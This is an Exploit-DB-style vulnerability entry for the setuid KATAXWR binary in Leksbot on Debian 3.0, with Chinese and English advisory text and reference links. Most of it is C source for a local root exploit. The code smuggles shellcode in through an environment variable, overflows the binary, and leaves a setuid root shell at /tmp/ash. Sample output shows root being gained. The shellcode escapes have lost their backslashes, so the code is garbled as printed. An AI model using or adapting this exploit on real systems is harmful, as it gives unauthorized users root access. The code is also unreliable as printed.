https://www.exploit-db.com/exploits/22567
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200305-075

DebianGNU/Linux中的leksbot1.2.3安装KATAXWR作为setuidroot，本地用户可以通过利用和升级权限有关的未知漏洞获取根权限，KATAXWR没有设计有该漏洞。

/*
source: http://www.securityfocus.com/bid/7505/info

Multiple vulnerabilities have been reported for Leksbot. The precise nature of these vulnerabilities are currently unknown however, exploitation of this issue may result in an attacker obtaining elevated privileges. This is because in some installations, the Leksbot binary may be installed setuid.
*/

/* by gunzip 
 * KATAXWR/leksbot local root exploit
 * for Debian Linux 3.0
 * http://www.securityfocus.com/bid/7505
 * change command if you don't like it (gives a root shell in /tmp/ash)
 * http://members.xoom.it/gunzip . more to come
*/
#define COMMAND "cp /bin/ash /tmp && chmod 4755 /tmp/ash"
#define PATH	"/usr/bin/KATAXWR"
#define ADDR	512
#define SIZE	4096
#define OFFSET	2700

char shellcode[] = /* taken from lsd-pl */
    "xebx22"             /* jmp     <cmdshellcode+36>      */
    "x59"                 /* popl    %ecx                   */
    "x31xc0"             /* xorl    %eax,%eax              */
    "x50"                 /* pushl   %eax                   */
    "x68""//sh"           /* pushl   $0x68732f2f            */
    "x68""/bin"           /* pushl   $0x6e69622f            */
    "x89xe3"             /* movl    %esp,%ebx              */
    "x50"                 /* pushl   %eax                   */
    "x66x68""-c"         /* pushw   $0x632d                */
    "x89xe7"             /* movl    %esp,%edi              */
    "x50"                 /* pushl   %eax                   */
    "x51"                 /* pushl   %ecx                   */
    "x57"                 /* pushl   %edi                   */
    "x53"                 /* pushl   %ebx                   */
    "x89xe1"             /* movl    %esp,%ecx              */
    "x99"                 /* cdql                           */
    "xb0x0b"             /* movb    $0x0b,%al              */
    "xcdx80"             /* int     $0x80                  */
    "xe8xd9xffxffxff" /* call    <cmdshellcode+2>       */
    COMMAND;

static char cmd[SIZE];

main(int argc, char *argv[])
{
	char buf[ADDR];
	char egg[SIZE];
	int i, offset ;
	unsigned long ret ;
	unsigned long sp = (unsigned long) &sp ;
	printf("Local (possibly) root exploit for /usr/bin/KATAXWR (leksbot)n"
	       "tested on Debian 3.0 - usage: ./ex [offset] - by gunzipn");	
	if ( argv[1] ) offset = atoi( argv[1] ); else offset = OFFSET ; 
	ret = sp + offset ;
	memset( cmd, 0x00, SIZE );
	memset( buf, 0x00, ADDR );
	memset( egg, 0x41, SIZE );
	memcpy( &egg[ SIZE - strlen( shellcode ) - 1 ], shellcode, strlen( shellcode ));
	memcpy( egg, "EGG=", 4 );
	egg[ SIZE - 1 ] = 0 ;
	putenv( egg );
 	for ( i=0; i < ADDR ; i += 4 ) *( unsigned long *)&buf[ i ] = ret;
	*( unsigned long *)&buf[ ADDR - 4 ] =  0x00000000 ; /*  :-?  */
	if (!(ret&0xff)||!(ret&0xff00)||!(ret&0xff0000)||!(ret&0xff000000)) {
		printf("Return address contains null byte(s), change offset and retry.n");
		exit( -1 );
	}
	printf( "retaddr=0x%.08x offset=%d len=%dn", (unsigned int)ret, offset, strlen( buf ));
	snprintf ( cmd, SIZE - 4, " echo '%s' | %s", buf, PATH );
	system( cmd );
}
/*
 bash-2.05b$ ./a.out
 retaddr=0xbffff668 offset=2700 len=508
 Please insert the term
 #dwsete tin simasia__#
 Do you want to add an other term?(y-n)
 bash-2.05b$ /tmp/ash
 # id
 uid=1002(test) gid=1002(test) euid=0(root) groups=1002(test)
*/

来源:DEBIAN
名称:DSA-299
链接:http://www.debian.org/security/2003/dsa-299
来源:XF
名称:kataxwr-gain-privileges(11945)
链接:http://xforce.iss.net/xforce/xfdb/11945
来源:BID
名称:7505
链接:http://www.securityfocus.com/bid/7505